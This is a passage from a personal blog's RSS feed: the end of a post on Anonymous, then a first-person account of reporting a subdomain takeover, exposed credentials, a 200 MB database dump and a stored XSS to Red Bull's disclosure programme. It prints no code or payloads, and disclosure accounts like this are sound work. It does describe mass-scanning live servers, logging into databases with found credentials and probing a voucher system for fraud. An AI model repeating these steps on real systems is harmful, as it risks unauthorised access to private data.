At his sentencing on May 27, 2014, he was given &quot;time served&quot; for co-operating with the FBI and set free under one year of probation.</p><p>Anonymous reacted to Sabu&apos;s unmasking and betrayal of LulzSec on Twitter: &quot;#Anonymous is a hydra, cut off one head and we grow two back&quot;.</p><p>If you would like to learn more about Anonymous, here is some suggested reading material: <em>We Are Anonymous: Inside the Hacker World of LulzSec, Anonymous, and the Global Cyber Insurgency</em>.</p><p>OR</p><p>Here is my own copy of &quot;The Many Faces of Anonymous&quot;.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-15.png" class="kg-image" alt="Internet Relay Chat And Hackers" loading="lazy" width="2000" height="2667" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-15.png 600w, https://flaviu.io/content/images/size/w1000/2020/09/image-15.png 1000w, https://flaviu.io/content/images/size/w1600/2020/09/image-15.png 1600w, https://flaviu.io/content/images/size/w2400/2020/09/image-15.png 2400w" sizes="(min-width: 720px) 720px"><figcaption>The Many Faces Of Anonymous - Book</figcaption></figure><!--kg-card-begin: markdown--><p>Have you got any suggestions for me? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article. Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[My Journey With Red Bull]]></title><description><![CDATA[They say the devil makes work for idle hands and there has never been a more apt saying. With the summer practically spent in lockdown and all caught up on my University work I decided.....]]></description><link>https://flaviu.io/my-bug-bounty-journey-with-redbull/</link><guid isPermaLink="false">5f636c271679673a38c4ab95</guid><category><![CDATA[bugbounty]]></category><category><![CDATA[hacking]]></category><category><![CDATA[subdomaintakeover]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Mon, 21 Sep 2020 17:33:23 GMT</pubDate><media:content url="https://flaviu.io/content/images/2020/09/redbull2-1.jpg" medium="image"/><content:encoded><![CDATA[<hr><img src="https://flaviu.io/content/images/2020/09/redbull2-1.jpg" alt="My Journey With Red Bull"><p>They say <em>the devil makes work for idle hands</em> and there has never been a more apt saying. With the summer practically spent in lockdown and all caught up on my University work, I decided it would be the right time to start a blog. Like anything you put out there on the internet, it needed content and lots of it. It was then I decided to put to the test some of the skills I had learnt so far from University and what I had taught myself. 
This led me to subdomain takeovers, which I have covered in a previous post, and from there to bug bounties.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/redbull3.jpg" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1920" height="1277" srcset="https://flaviu.io/content/images/size/w600/2020/09/redbull3.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/09/redbull3.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/09/redbull3.jpg 1600w, https://flaviu.io/content/images/2020/09/redbull3.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>&quot;<b>Red Bull gives you wings</b>&quot;</figcaption></figure><p>There is a stark contrast between pentesting labs (e.g. hackthebox) and bug bounties on real-world targets. Having spent a lot of my time on these labs, where vulnerabilities are carefully placed within challenges, I had an understanding of how to solve them. I was hopeful that I would be fine finding bugs in the real world, and boy was I wrong. I remember seeing an announcement by HackerOne saying they had reached 300,000 registered hackers on their platform and I was thinking... oh wow&#x2026; so much competition. That is very true: there are a lot of hackers and you will submit reports that turn out to be duplicates.</p><p>A couple of good deeds and my bug bounties (not that they were bountiful at all) ranged from the GOV/Military and NHS to Fortune 500 companies, to name a few (Garmin &amp; Accenture Hall of Fame). Coming back to the intended article, I remember watching Formula 1 on Netflix one weekend, and that is when the thought came to me: <em>&#x201C;I wonder if Red Bull has a bug bounty programme&#x201D;</em>. Luckily, I found that they have a Vulnerability Disclosure Program. I decided to set to work and see what vulnerabilities I could find within their company&#x2019;s website. 
Since I am still a beginner and everything is a learning curve for me, I could only test for a few things that I knew how to perform successfully.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-9.png" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="960" height="982" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-9.png 600w, https://flaviu.io/content/images/2020/09/image-9.png 960w" sizes="(min-width: 720px) 720px"><figcaption>Red Bull Formula 1 Car (RB16)</figcaption></figure><p>Since I had this frenzy going on with subdomain takeovers, I decided to look and see if I could find any for Red Bull; lo and behold, I found a couple that caught my attention and proceeded to look into those. I had successfully taken over next.redbull.com and uploaded a Proof of Concept. Time to get in touch with Red Bull&#x2019;s security team.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/red2.PNG" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1920" height="499" srcset="https://flaviu.io/content/images/size/w600/2020/09/red2.PNG 600w, https://flaviu.io/content/images/size/w1000/2020/09/red2.PNG 1000w, https://flaviu.io/content/images/size/w1600/2020/09/red2.PNG 1600w, https://flaviu.io/content/images/2020/09/red2.PNG 1920w" sizes="(min-width: 720px) 720px"><figcaption>Subdomain takeover Red Bull</figcaption></figure><p>This is when Mark was assigned to my report, and from that point on I communicated with him directly. 
I sent a report to him and soon after got a reply; Mark thanked me, and it made me quite happy that someone appreciated my work.</p><figure class="kg-card kg-image-card"><img src="https://flaviu.io/content/images/2020/09/image-1.png" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1163" height="331" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-1.png 600w, https://flaviu.io/content/images/size/w1000/2020/09/image-1.png 1000w, https://flaviu.io/content/images/2020/09/image-1.png 1163w" sizes="(min-width: 720px) 720px"></figure><p>Soon after, Mark wrote back thanking me again for my report and telling me that he wanted to organize a reward for me. Red Bull does not have a dedicated bug bounty program with pre-defined rewards in place, and they don&apos;t see financial compensation as an appropriate way to reward individuals. However, they do practice a culture of individual rewards based on the novelty and criticality of the findings delivered.</p><figure class="kg-card kg-image-card"><img src="https://flaviu.io/content/images/2020/09/image-2.png" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1128" height="274" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-2.png 600w, https://flaviu.io/content/images/size/w1000/2020/09/image-2.png 1000w, https://flaviu.io/content/images/2020/09/image-2.png 1128w" sizes="(min-width: 720px) 720px"></figure><p>For my first bounty I was happy with anything that was rewarded; I am not in a rush for monetary rewards, I would rather learn from the experience and have fun doing it.</p><p>While I was waiting for my reward, things got delayed slightly due to Covid-19, and a couple of weeks went by without any delivery. Mark decided to do something about this and came up with the plan to offer me a voucher to use on the <a href="https://redbullshop.com">Red Bull shop</a> (this was an exception and only a one-time reward to honour me). 
I was excited again because guess what... they have Red Bull Racing merchandise there!</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-3.png" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1833" height="982" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-3.png 600w, https://flaviu.io/content/images/size/w1000/2020/09/image-3.png 1000w, https://flaviu.io/content/images/size/w1600/2020/09/image-3.png 1600w, https://flaviu.io/content/images/2020/09/image-3.png 1833w" sizes="(min-width: 720px) 720px"><figcaption>Red Bull Shop</figcaption></figure><p>Before my voucher was due to be generated, and since I had this one-time opportunity for a voucher, I decided over the weekend to take a look over more of Red Bull&apos;s infrastructure and perform different kinds of tests. This time I was looking for servers that would be vulnerable to injections and for sensitive files.</p><p>I set up all my scripts, all my payloads, all the wordlists, all the targets... ready to go... hit enter. I launched all these tasks in the background, as I knew this would be very laborious and I would end up with many false positives that I would need to check manually.</p><p>Over the weekend I began to inspect all the hits and the different files I managed to access and scrape from thousands of servers belonging to Red Bull.</p><p>I took notes on anything interesting to be able to tell the security team afterwards.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-4.png" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="425" height="247"><figcaption>Red Bull</figcaption></figure><p>While a few alerts were just simple ones, like showing phpinfo, and weren&apos;t really disclosing any credentials, others led me to some debug logs and some interesting dev panels, but nothing was too sensitive yet... 
digging, digging, digging... a couple of hours later I came across some JavaScript files that had credentials to an FTP account, but they weren&apos;t valid... hmm... right... I suppose it&apos;s still informative to see how they format their usernames and passwords.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/red.jpg" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1920" height="1187" srcset="https://flaviu.io/content/images/size/w600/2020/09/red.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/09/red.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/09/red.jpg 1600w, https://flaviu.io/content/images/2020/09/red.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>Red Bull drink</figcaption></figure><p>Some time later I came across some interesting files that piqued my interest... this time they were JSON JWT tokens... and yet again a magic JS file, however this time I struck lucky because it had credentials to endpoints, a few API secret keys and a couple of MySQL databases that were valid and populated with data. Wow... I thought this one must be worthwhile reporting!</p><p>Also, as a surprise, the drinks finally arrived...!</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/drinks.jpg" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="360" height="480"><figcaption>Red Bull reward</figcaption></figure><p>I do remember Mark saying in an e-mail... &apos;do enjoy the drinks when they arrive&apos;</p><p>I really liked the <a href="https://www.redbull.com/us-en/energydrink/red-bull-summer-edition">Red Bull Watermelon Summer Edition</a>, Cheers!</p><p>My hunt was not finished yet. I kept looking around and unbelievably came across a MySQL dump of 200 MB, and this was a goldmine. 
You can imagine what kind of data was inside this dump.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/gold.jpg" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1920" height="1080" srcset="https://flaviu.io/content/images/size/w600/2020/09/gold.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/09/gold.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/09/gold.jpg 1600w, https://flaviu.io/content/images/2020/09/gold.jpg 1920w" sizes="(min-width: 720px) 720px"><figcaption>Rainbow, pot of gold!</figcaption></figure><p>I decided this was enough for me and started putting everything together in a new report for the Red Bull Security Team.</p><p>Finished, Sent.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-5.png" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1067" height="316" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-5.png 600w, https://flaviu.io/content/images/size/w1000/2020/09/image-5.png 1000w, https://flaviu.io/content/images/2020/09/image-5.png 1067w" sizes="(min-width: 720px) 720px"><figcaption>Email from Mark - Red Bull Security Team</figcaption></figure><p>Perfect... I was satisfied that my findings were useful to them and that they were working on fixing those. 
</p><p>Reward update</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/image-6.png" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="1145" height="228" srcset="https://flaviu.io/content/images/size/w600/2020/09/image-6.png 600w, https://flaviu.io/content/images/size/w1000/2020/09/image-6.png 1000w, https://flaviu.io/content/images/2020/09/image-6.png 1145w" sizes="(min-width: 720px) 720px"><figcaption>Reward increase from &#xA3;100 to &#xA3;300</figcaption></figure><p>This was great news to me, as I really wanted to get some nice Red Bull Formula 1 merchandise and I felt that this amount would be enough for a couple of items from their shop.</p><p>Mark was amazing to deal with and he got me the voucher. I&apos;ll admit I couldn&apos;t help myself and messed around with a couple of Burp requests to check out how this voucher worked. I couldn&apos;t really do much to fool the system in any way, especially with my little knowledge about APIs; however, I found a point where I could inject JS/HTML and achieve persistent XSS during the checkout process. I informed Mark about it, and he replied that they were already working on it, as it had been reported by a previous individual. 
I then placed the order; it was delivered to me fast even though I only used the regular &apos;free&apos; delivery!</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2020/09/merch.jpg" class="kg-image" alt="My Journey With Red Bull" loading="lazy" width="2000" height="2667" srcset="https://flaviu.io/content/images/size/w600/2020/09/merch.jpg 600w, https://flaviu.io/content/images/size/w1000/2020/09/merch.jpg 1000w, https://flaviu.io/content/images/size/w1600/2020/09/merch.jpg 1600w, https://flaviu.io/content/images/size/w2400/2020/09/merch.jpg 2400w" sizes="(min-width: 720px) 720px"><figcaption>Red Bull merchandise - reward</figcaption></figure><p>A couple of thoughts I&apos;d like to share about Red Bull. I wasn&apos;t aware until now of how big this company is and just how many events they are involved in; trust me when I say Red Bull is huge.</p><blockquote>This blog post is not sponsored!</blockquote><p>I am glad that I got my first bounty from Red Bull because the company was really nice to deal with and they were quick in their correspondence; Mark, too, was very pleasant to engage with.</p><p>Red Bull is currently working on a bug bounty program, so they can track and send non-monetary rewards out to everyone who has earned them.</p><!--kg-card-begin: markdown--><p>Have you got any suggestions for me? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article. Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item></channel></rss>